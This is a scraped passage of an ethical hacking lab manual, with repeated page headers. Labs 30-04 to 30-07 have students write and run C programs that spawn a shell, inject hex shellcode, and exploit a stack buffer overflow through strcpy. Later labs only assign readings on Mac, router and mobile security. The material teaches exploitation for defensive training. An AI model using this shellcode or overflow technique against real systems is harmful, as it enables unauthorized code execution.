Page | 692 Ethical Hacking and Countermeasures v6 Copyright © EC-Council All Rights Reserved. Reproduction Strictly Prohibited.

� It should print one

� Disassemble main using gdb

� Type the following: $gdb example3

Page 61: CEHv6 Lab Guide Module 20 to Module 36 - index-of.es/index-of.es/Hacking/Lab-Guide/CEHv6 Lab Guide 1... · In the CEHv6 Labs CD-ROM, navigate to Module 27 Open the Bypassing Firewall.pdf

Ethical Hacking and Countermeasures v6 Lab Manual EC-Council

Page | 693 Ethical Hacking and Countermeasures v6 Copyright © EC-Council All Rights Reserved. Reproduction Strictly Prohibited.

� Type: disassemble main

Page 62: CEHv6 Lab Guide Module 20 to Module 36 - index-of.es/index-of.es/Hacking/Lab-Guide/CEHv6 Lab Guide 1... · In the CEHv6 Labs CD-ROM, navigate to Module 27 Open the Bypassing Firewall.pdf

Ethical Hacking and Countermeasures v6 Lab Manual EC-Council

Page | 694 Ethical Hacking and Countermeasures v6 Copyright © EC-Council All Rights Reserved. Reproduction Strictly Prohibited.

Page 63: CEHv6 Lab Guide Module 20 to Module 36 - index-of.es/index-of.es/Hacking/Lab-Guide/CEHv6 Lab Guide 1... · In the CEHv6 Labs CD-ROM, navigate to Module 27 Open the Bypassing Firewall.pdf

Ethical Hacking and Countermeasures v6 Lab Manual EC-Council

Page | 695 Ethical Hacking and Countermeasures v6 Copyright © EC-Council All Rights Reserved. Reproduction Strictly Prohibited.

Lab 30-04

Objective:

shellcode.c

� In the CEHv6 Labs CD-ROM, navigate to Module 26

� Create another program in kedit

Kedit shellcode.c

Type the following: #include <stdio.h>

void main() {

char *name[2];

name[0] = "/bin/sh";

name[1] = NULL;

execve(name[0], name, NULL);

}

Page 64: CEHv6 Lab Guide Module 20 to Module 36 - index-of.es/index-of.es/Hacking/Lab-Guide/CEHv6 Lab Guide 1... · In the CEHv6 Labs CD-ROM, navigate to Module 27 Open the Bypassing Firewall.pdf

Ethical Hacking and Countermeasures v6 Lab Manual EC-Council

Page | 696 Ethical Hacking and Countermeasures v6 Copyright © EC-Council All Rights Reserved. Reproduction Strictly Prohibited.

� Compile the program by typing: $ gcc -o shellcode -ggdb -static shellcode.c

Page 65: CEHv6 Lab Guide Module 20 to Module 36 - index-of.es/index-of.es/Hacking/Lab-Guide/CEHv6 Lab Guide 1... · In the CEHv6 Labs CD-ROM, navigate to Module 27 Open the Bypassing Firewall.pdf

Ethical Hacking and Countermeasures v6 Lab Manual EC-Council

Page | 697 Ethical Hacking and Countermeasures v6 Copyright © EC-Council All Rights Reserved. Reproduction Strictly Prohibited.

� Type: $ gdb shellcode

� Then, type disassemble main.

Page 66: CEHv6 Lab Guide Module 20 to Module 36 - index-of.es/index-of.es/Hacking/Lab-Guide/CEHv6 Lab Guide 1... · In the CEHv6 Labs CD-ROM, navigate to Module 27 Open the Bypassing Firewall.pdf

Ethical Hacking and Countermeasures v6 Lab Manual EC-Council

Page | 698 Ethical Hacking and Countermeasures v6 Copyright © EC-Council All Rights Reserved. Reproduction Strictly Prohibited.

� Type disassemble _execve

Page 67: CEHv6 Lab Guide Module 20 to Module 36 - index-of.es/index-of.es/Hacking/Lab-Guide/CEHv6 Lab Guide 1... · In the CEHv6 Labs CD-ROM, navigate to Module 27 Open the Bypassing Firewall.pdf

Ethical Hacking and Countermeasures v6 Lab Manual EC-Council

Page | 699 Ethical Hacking and Countermeasures v6 Copyright © EC-Council All Rights Reserved. Reproduction Strictly Prohibited.

Page 68: CEHv6 Lab Guide Module 20 to Module 36 - index-of.es/index-of.es/Hacking/Lab-Guide/CEHv6 Lab Guide 1... · In the CEHv6 Labs CD-ROM, navigate to Module 27 Open the Bypassing Firewall.pdf

Ethical Hacking and Countermeasures v6 Lab Manual EC-Council

Page | 700 Ethical Hacking and Countermeasures v6 Copyright © EC-Council All Rights Reserved. Reproduction Strictly Prohibited.

Lab 30-05

Objective:

exit.c

� In the CEHv6 Labs CD-ROM, navigate to Module 26

� Create another program in kedit. Kedit exit.c

Type the following: #include <stdlib.h>

void main() {

exit(0);

}

� Compile the program using: $ gcc -o exit -static exit.c

� View the generated code gdb by typing: gdb exit

� Then:

disassemble _exit

Page 69: CEHv6 Lab Guide Module 20 to Module 36 - index-of.es/index-of.es/Hacking/Lab-Guide/CEHv6 Lab Guide 1... · In the CEHv6 Labs CD-ROM, navigate to Module 27 Open the Bypassing Firewall.pdf

Ethical Hacking and Countermeasures v6 Lab Manual EC-Council

Page | 701 Ethical Hacking and Countermeasures v6 Copyright © EC-Council All Rights Reserved. Reproduction Strictly Prohibited.

Lab 30-06

Objective:

testsc.c

� In the CEHv6 Labs CD-ROM, navigate to Module 26

� Create another program in kedit.

Kedit testsc.c

� Type the following:

char shellcode[] =

"\xeb\x2a\x5e\x89\x76\x08\xc6\x46\x07\x00\xc7\x46\x0c\x00\x00\x00"

"\x00\xb8\x0b\x00\x00\x00\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80"

"\xb8\x01\x00\x00\x00\xbb\x00\x00\x00\x00\xcd\x80\xe8\xd1\xff\xff"

"\xff\x2f\x62\x69\x6e\x2f\x73\x68\x00\x89\xec\x5d\xc3";

void main() {

int *ret;

ret = (int *)&ret + 2;

(*ret) = (int)shellcode;

}

� Compile the program using: $ gcc -o testsc testsc.c

� Run the program by typing:

./testsc

� You should see a shell launched.

� Type exit to exit the shell.

Page 70: CEHv6 Lab Guide Module 20 to Module 36 - index-of.es/index-of.es/Hacking/Lab-Guide/CEHv6 Lab Guide 1... · In the CEHv6 Labs CD-ROM, navigate to Module 27 Open the Bypassing Firewall.pdf

Ethical Hacking and Countermeasures v6 Lab Manual EC-Council

Page | 702 Ethical Hacking and Countermeasures v6 Copyright © EC-Council All Rights Reserved. Reproduction Strictly Prohibited.

Lab 30-07

Objective:

exploit.c

� In the CEHv6 Labs CD-ROM, navigate to Module 26

� Create another program in kedit Kedit exploit.c

� Type the following:

char shellcode[] =

"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"

"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"

"\x80\xe8\xdc\xff\xff\xff/bin/sh";

char large_string[128];

void main() {

char buffer[96];

int i;

long *long_ptr = (long *) large_string;

for (i = 0; i < 32; i++)

*(long_ptr + i) = (int) buffer;

for (i = 0; i < strlen(shellcode); i++)

large_string[i] = shellcode[i];

strcpy(buffer,large_string);

}

� Compile the program using: $ gcc -o exploit exploit.c

� Run the program by typing:

./exploit

� You should see a shell launched

Type exit to exit the shell

Page 71: CEHv6 Lab Guide Module 20 to Module 36 - index-of.es/index-of.es/Hacking/Lab-Guide/CEHv6 Lab Guide 1... · In the CEHv6 Labs CD-ROM, navigate to Module 27 Open the Bypassing Firewall.pdf

Ethical Hacking and Countermeasures v6 Lab Manual EC-Council

Page | 703 Ethical Hacking and Countermeasures v6 Copyright © EC-Council All Rights Reserved. Reproduction Strictly Prohibited.

Module 34

Mac OS X Hacking

Page 72: CEHv6 Lab Guide Module 20 to Module 36 - index-of.es/index-of.es/Hacking/Lab-Guide/CEHv6 Lab Guide 1... · In the CEHv6 Labs CD-ROM, navigate to Module 27 Open the Bypassing Firewall.pdf

Ethical Hacking and Countermeasures v6 Lab Manual EC-Council

Page | 704 Ethical Hacking and Countermeasures v6 Copyright © EC-Council All Rights Reserved. Reproduction Strictly Prohibited.

Lab 34-01

� In the CEHv6 Labs CD-ROM, navigate to Module 34

� Open the Securing Mac OS X.pdf and read the content

� Read the Security Hardening Guideline topic

Page 73: CEHv6 Lab Guide Module 20 to Module 36 - index-of.es/index-of.es/Hacking/Lab-Guide/CEHv6 Lab Guide 1... · In the CEHv6 Labs CD-ROM, navigate to Module 27 Open the Bypassing Firewall.pdf

Ethical Hacking and Countermeasures v6 Lab Manual EC-Council

Page | 705 Ethical Hacking and Countermeasures v6 Copyright © EC-Council All Rights Reserved. Reproduction Strictly Prohibited.

� In the same PDF file, read the Data Encryption topic

Page 74: CEHv6 Lab Guide Module 20 to Module 36 - index-of.es/index-of.es/Hacking/Lab-Guide/CEHv6 Lab Guide 1... · In the CEHv6 Labs CD-ROM, navigate to Module 27 Open the Bypassing Firewall.pdf

Ethical Hacking and Countermeasures v6 Lab Manual EC-Council

Page | 706 Ethical Hacking and Countermeasures v6 Copyright © EC-Council All Rights Reserved. Reproduction Strictly Prohibited.

Lab 34-02

� In the CEHv6 Labs CD-ROM, navigate to Module 34

� Open the Security in Mac OS X.pdf and read the content

� Read the Secure Default Settings topic

Page 75: CEHv6 Lab Guide Module 20 to Module 36 - index-of.es/index-of.es/Hacking/Lab-Guide/CEHv6 Lab Guide 1... · In the CEHv6 Labs CD-ROM, navigate to Module 27 Open the Bypassing Firewall.pdf

Ethical Hacking and Countermeasures v6 Lab Manual EC-Council

Page | 707 Ethical Hacking and Countermeasures v6 Copyright © EC-Council All Rights Reserved. Reproduction Strictly Prohibited.

� In the same PDF file, read the Modern Security Architecture topic

Page 76: CEHv6 Lab Guide Module 20 to Module 36 - index-of.es/index-of.es/Hacking/Lab-Guide/CEHv6 Lab Guide 1... · In the CEHv6 Labs CD-ROM, navigate to Module 27 Open the Bypassing Firewall.pdf

Ethical Hacking and Countermeasures v6 Lab Manual EC-Council

Page | 708 Ethical Hacking and Countermeasures v6 Copyright © EC-Council All Rights Reserved. Reproduction Strictly Prohibited.

� Next, read the Strong Authentication topic

Page 77: CEHv6 Lab Guide Module 20 to Module 36 - index-of.es/index-of.es/Hacking/Lab-Guide/CEHv6 Lab Guide 1... · In the CEHv6 Labs CD-ROM, navigate to Module 27 Open the Bypassing Firewall.pdf

Ethical Hacking and Countermeasures v6 Lab Manual EC-Council

Page | 709 Ethical Hacking and Countermeasures v6 Copyright © EC-Council All Rights Reserved. Reproduction Strictly Prohibited.

Lab 34-03

� In the CEHv6 Labs CD-ROM, navigate to Module 34

� Open the Mac OS X 10.4 Security Checklist.pdf and read the content

� Read the OS X Security Architecture topic

Page 78: CEHv6 Lab Guide Module 20 to Module 36 - index-of.es/index-of.es/Hacking/Lab-Guide/CEHv6 Lab Guide 1... · In the CEHv6 Labs CD-ROM, navigate to Module 27 Open the Bypassing Firewall.pdf

Ethical Hacking and Countermeasures v6 Lab Manual EC-Council

Page | 710 Ethical Hacking and Countermeasures v6 Copyright © EC-Council All Rights Reserved. Reproduction Strictly Prohibited.

� In the same PDF file, read the User Account Security topic

Page 79: CEHv6 Lab Guide Module 20 to Module 36 - index-of.es/index-of.es/Hacking/Lab-Guide/CEHv6 Lab Guide 1... · In the CEHv6 Labs CD-ROM, navigate to Module 27 Open the Bypassing Firewall.pdf

Ethical Hacking and Countermeasures v6 Lab Manual EC-Council

Page | 711 Ethical Hacking and Countermeasures v6 Copyright © EC-Council All Rights Reserved. Reproduction Strictly Prohibited.

� Next, read the Securing System Preferences topic

Page 80: CEHv6 Lab Guide Module 20 to Module 36 - index-of.es/index-of.es/Hacking/Lab-Guide/CEHv6 Lab Guide 1... · In the CEHv6 Labs CD-ROM, navigate to Module 27 Open the Bypassing Firewall.pdf

Ethical Hacking and Countermeasures v6 Lab Manual EC-Council

Page | 712 Ethical Hacking and Countermeasures v6 Copyright © EC-Council All Rights Reserved. Reproduction Strictly Prohibited.

Lab 34-04

� In the CEHv6 Labs CD-ROM, navigate to Module 34

� Open the Mac OS X Hacking Poses Wide Risk to Windows.pdf and read the content

� Read the Mac OS X Hacking Poses Wide Risk… for Windows topic

Page 81: CEHv6 Lab Guide Module 20 to Module 36 - index-of.es/index-of.es/Hacking/Lab-Guide/CEHv6 Lab Guide 1... · In the CEHv6 Labs CD-ROM, navigate to Module 27 Open the Bypassing Firewall.pdf

Ethical Hacking and Countermeasures v6 Lab Manual EC-Council

Page | 713 Ethical Hacking and Countermeasures v6 Copyright © EC-Council All Rights Reserved. Reproduction Strictly Prohibited.

Module 35

Hacking Routers, Cable Modems, and Firewalls

Page 82: CEHv6 Lab Guide Module 20 to Module 36 - index-of.es/index-of.es/Hacking/Lab-Guide/CEHv6 Lab Guide 1... · In the CEHv6 Labs CD-ROM, navigate to Module 27 Open the Bypassing Firewall.pdf

Ethical Hacking and Countermeasures v6 Lab Manual EC-Council

Page | 714 Ethical Hacking and Countermeasures v6 Copyright © EC-Council All Rights Reserved. Reproduction Strictly Prohibited.

Lab 35-01

� In the CEHv6 Labs CD-ROM, navigate to Module 35

� Open the Chapter 9-Firewalls.pdf and read the content

� Read the FIREWALL IDENTIFICATION topic

Page 83: CEHv6 Lab Guide Module 20 to Module 36 - index-of.es/index-of.es/Hacking/Lab-Guide/CEHv6 Lab Guide 1... · In the CEHv6 Labs CD-ROM, navigate to Module 27 Open the Bypassing Firewall.pdf

Ethical Hacking and Countermeasures v6 Lab Manual EC-Council

Page | 715 Ethical Hacking and Countermeasures v6 Copyright © EC-Council All Rights Reserved. Reproduction Strictly Prohibited.

� Next, read the PACKET FILTERING topic

Page 84: CEHv6 Lab Guide Module 20 to Module 36 - index-of.es/index-of.es/Hacking/Lab-Guide/CEHv6 Lab Guide 1... · In the CEHv6 Labs CD-ROM, navigate to Module 27 Open the Bypassing Firewall.pdf

Ethical Hacking and Countermeasures v6 Lab Manual EC-Council

Page | 716 Ethical Hacking and Countermeasures v6 Copyright © EC-Council All Rights Reserved. Reproduction Strictly Prohibited.

Lab 35-02

� In the CEHv6 Labs CD-ROM, navigate to Module 35

� Open the CISCO ROUTERS AS TARGETS.pdf and read the content

� Read the Compromised Router Sniffing topic

Page 85: CEHv6 Lab Guide Module 20 to Module 36 - index-of.es/index-of.es/Hacking/Lab-Guide/CEHv6 Lab Guide 1... · In the CEHv6 Labs CD-ROM, navigate to Module 27 Open the Bypassing Firewall.pdf

Ethical Hacking and Countermeasures v6 Lab Manual EC-Council

Page | 717 Ethical Hacking and Countermeasures v6 Copyright © EC-Council All Rights Reserved. Reproduction Strictly Prohibited.

� In the same PDF file, read the Why we need to protect router resources topic

� Next, read the Router Audit Tool topic

Page 86: CEHv6 Lab Guide Module 20 to Module 36 - index-of.es/index-of.es/Hacking/Lab-Guide/CEHv6 Lab Guide 1... · In the CEHv6 Labs CD-ROM, navigate to Module 27 Open the Bypassing Firewall.pdf

Ethical Hacking and Countermeasures v6 Lab Manual EC-Council

Page | 718 Ethical Hacking and Countermeasures v6 Copyright © EC-Council All Rights Reserved. Reproduction Strictly Prohibited.

Lab 35-03

� In the CEHv6 Labs CD-ROM, navigate to Module 35

� Open the Cisco Router Security Best Practices.pdf and read the content

� Read the Access management topic

Page 87: CEHv6 Lab Guide Module 20 to Module 36 - index-of.es/index-of.es/Hacking/Lab-Guide/CEHv6 Lab Guide 1... · In the CEHv6 Labs CD-ROM, navigate to Module 27 Open the Bypassing Firewall.pdf

Ethical Hacking and Countermeasures v6 Lab Manual EC-Council

Page | 719 Ethical Hacking and Countermeasures v6 Copyright © EC-Council All Rights Reserved. Reproduction Strictly Prohibited.

� In the same PDF file, read the SNTP Security topic

Page 88: CEHv6 Lab Guide Module 20 to Module 36 - index-of.es/index-of.es/Hacking/Lab-Guide/CEHv6 Lab Guide 1... · In the CEHv6 Labs CD-ROM, navigate to Module 27 Open the Bypassing Firewall.pdf

Ethical Hacking and Countermeasures v6 Lab Manual EC-Council

Page | 720 Ethical Hacking and Countermeasures v6 Copyright © EC-Council All Rights Reserved. Reproduction Strictly Prohibited.

� Next, read the Access control lists topic

Page 89: CEHv6 Lab Guide Module 20 to Module 36 - index-of.es/index-of.es/Hacking/Lab-Guide/CEHv6 Lab Guide 1... · In the CEHv6 Labs CD-ROM, navigate to Module 27 Open the Bypassing Firewall.pdf

Ethical Hacking and Countermeasures v6 Lab Manual EC-Council

Page | 721 Ethical Hacking and Countermeasures v6 Copyright © EC-Council All Rights Reserved. Reproduction Strictly Prohibited.

Lab 35-04

� In the CEHv6 Labs CD-ROM, navigate to Module 35

� Open the 8 steps to protect your Cisco router.pdf and read the content

Page 90: CEHv6 Lab Guide Module 20 to Module 36 - index-of.es/index-of.es/Hacking/Lab-Guide/CEHv6 Lab Guide 1... · In the CEHv6 Labs CD-ROM, navigate to Module 27 Open the Bypassing Firewall.pdf

Ethical Hacking and Countermeasures v6 Lab Manual EC-Council

Page | 722 Ethical Hacking and Countermeasures v6 Copyright © EC-Council All Rights Reserved. Reproduction Strictly Prohibited.

� In the same PDF file, read the Encrypt all passwords topic

Page 91: CEHv6 Lab Guide Module 20 to Module 36 - index-of.es/index-of.es/Hacking/Lab-Guide/CEHv6 Lab Guide 1... · In the CEHv6 Labs CD-ROM, navigate to Module 27 Open the Bypassing Firewall.pdf

Ethical Hacking and Countermeasures v6 Lab Manual EC-Council

Page | 723 Ethical Hacking and Countermeasures v6 Copyright © EC-Council All Rights Reserved. Reproduction Strictly Prohibited.

Module 36

Hacking Mobile Phones, PDA, and Handheld Devices

Page 92: CEHv6 Lab Guide Module 20 to Module 36 - index-of.es/index-of.es/Hacking/Lab-Guide/CEHv6 Lab Guide 1... · In the CEHv6 Labs CD-ROM, navigate to Module 27 Open the Bypassing Firewall.pdf

Ethical Hacking and Countermeasures v6 Lab Manual EC-Council

Page | 724 Ethical Hacking and Countermeasures v6 Copyright © EC-Council All Rights Reserved. Reproduction Strictly Prohibited.

Lab 36-01

� In the CEHv6 Labs CD-ROM, navigate to Module 36

� Open the Take Control of Your iPhone.pdf and read the content

� Read the QUICK START TO TAKING CONTROL OF AN iPHONE topic

Page 93: CEHv6 Lab Guide Module 20 to Module 36 - index-of.es/index-of.es/Hacking/Lab-Guide/CEHv6 Lab Guide 1... · In the CEHv6 Labs CD-ROM, navigate to Module 27 Open the Bypassing Firewall.pdf

Ethical Hacking and Countermeasures v6 Lab Manual EC-Council

Page | 725 Ethical Hacking and Countermeasures v6 Copyright © EC-Council All Rights Reserved. Reproduction Strictly Prohibited.

� In the same PDF file, read the 8 QUICK TROUBLESHOOTING STEPS topic

Page 94: CEHv6 Lab Guide Module 20 to Module 36 - index-of.es/index-of.es/Hacking/Lab-Guide/CEHv6 Lab Guide 1... · In the CEHv6 Labs CD-ROM, navigate to Module 27 Open the Bypassing Firewall.pdf

Ethical Hacking and Countermeasures v6 Lab Manual EC-Council

Page | 726 Ethical Hacking and Countermeasures v6 Copyright © EC-Council All Rights Reserved. Reproduction Strictly Prohibited.

� Next, read the AVOID NAVIGATION AND TYPING HASSLES topic

Page 95: CEHv6 Lab Guide Module 20 to Module 36 - index-of.es/index-of.es/Hacking/Lab-Guide/CEHv6 Lab Guide 1... · In the CEHv6 Labs CD-ROM, navigate to Module 27 Open the Bypassing Firewall.pdf

Ethical Hacking and Countermeasures v6 Lab Manual EC-Council

Page | 727 Ethical Hacking and Countermeasures v6 Copyright © EC-Council All Rights Reserved. Reproduction Strictly Prohibited.

Lab 36-02

� In the CEHv6 Labs CD-ROM, navigate to Module 36

� Open the iphone Hardware Unlock.pdf and read the content

Page 96: CEHv6 Lab Guide Module 20 to Module 36 - index-of.es/index-of.es/Hacking/Lab-Guide/CEHv6 Lab Guide 1... · In the CEHv6 Labs CD-ROM, navigate to Module 27 Open the Bypassing Firewall.pdf

Ethical Hacking and Countermeasures v6 Lab Manual EC-Council

Page | 728 Ethical Hacking and Countermeasures v6 Copyright © EC-Council All Rights Reserved. Reproduction Strictly Prohibited.

Lab 36-03

� In the CEHv6 Labs CD-ROM, navigate to Module 36

� Open the How to Unlock an iPhone.pdf and read the content

Page 97: CEHv6 Lab Guide Module 20 to Module 36 - index-of.es/index-of.es/Hacking/Lab-Guide/CEHv6 Lab Guide 1... · In the CEHv6 Labs CD-ROM, navigate to Module 27 Open the Bypassing Firewall.pdf

Ethical Hacking and Countermeasures v6 Lab Manual EC-Council

Page | 729 Ethical Hacking and Countermeasures v6 Copyright © EC-Council All Rights Reserved. Reproduction Strictly Prohibited.

Lab 36-04

� In the CEHv6 Labs CD-ROM, navigate to Module 36

� Open the The Anatomy of a Hack.pdf and read the content.

� Read the Understanding the Threats to Your Mobile Workforce topic

Page 98: CEHv6 Lab Guide Module 20 to Module 36 - index-of.es/index-of.es/Hacking/Lab-Guide/CEHv6 Lab Guide 1... · In the CEHv6 Labs CD-ROM, navigate to Module 27 Open the Bypassing Firewall.pdf

Ethical Hacking and Countermeasures v6 Lab Manual EC-Council

Page | 730 Ethical Hacking and Countermeasures v6 Copyright © EC-Council All Rights Reserved. Reproduction Strictly Prohibited.

� In the same PDF file, read the Anatomy of a Hack Video Companion Guide topic

Page 99: CEHv6 Lab Guide Module 20 to Module 36 - index-of.es/index-of.es/Hacking/Lab-Guide/CEHv6 Lab Guide 1... · In the CEHv6 Labs CD-ROM, navigate to Module 27 Open the Bypassing Firewall.pdf

Ethical Hacking and Countermeasures v6 Lab Manual EC-Council

Page | 731 Ethical Hacking and Countermeasures v6 Copyright © EC-Council All Rights Reserved. Reproduction Strictly Prohibited.

Lab 36-05

� In the CEHv6 Labs CD-ROM, navigate to Module 36

� Open the Mobile Handset Security.pdf and read the content

� Read the Security issues on mobile devices topic

Page 100: CEHv6 Lab Guide Module 20 to Module 36 - index-of.es/index-of.es/Hacking/Lab-Guide/CEHv6 Lab Guide 1... · In the CEHv6 Labs CD-ROM, navigate to Module 27 Open the Bypassing Firewall.pdf

Ethical Hacking and Countermeasures v6 Lab Manual EC-Council

Page | 732 Ethical Hacking and Countermeasures v6 Copyright © EC-Council All Rights Reserved. Reproduction Strictly Prohibited.

� In the same PDF file, read the Threats and Attacks topic

Page 101: CEHv6 Lab Guide Module 20 to Module 36 - index-of.es/index-of.es/Hacking/Lab-Guide/CEHv6 Lab Guide 1... · In the CEHv6 Labs CD-ROM, navigate to Module 27 Open the Bypassing Firewall.pdf

Ethical Hacking and Countermeasures v6 Lab Manual EC-Council

Page | 733 Ethical Hacking and Countermeasures v6 Copyright © EC-Council All Rights Reserved. Reproduction Strictly Prohibited.

Lab 36-06

� In the CEHv6 Labs CD-ROM, navigate to Module 36

� Open the Mobile Malware Threats and Prevention.pdf and read the content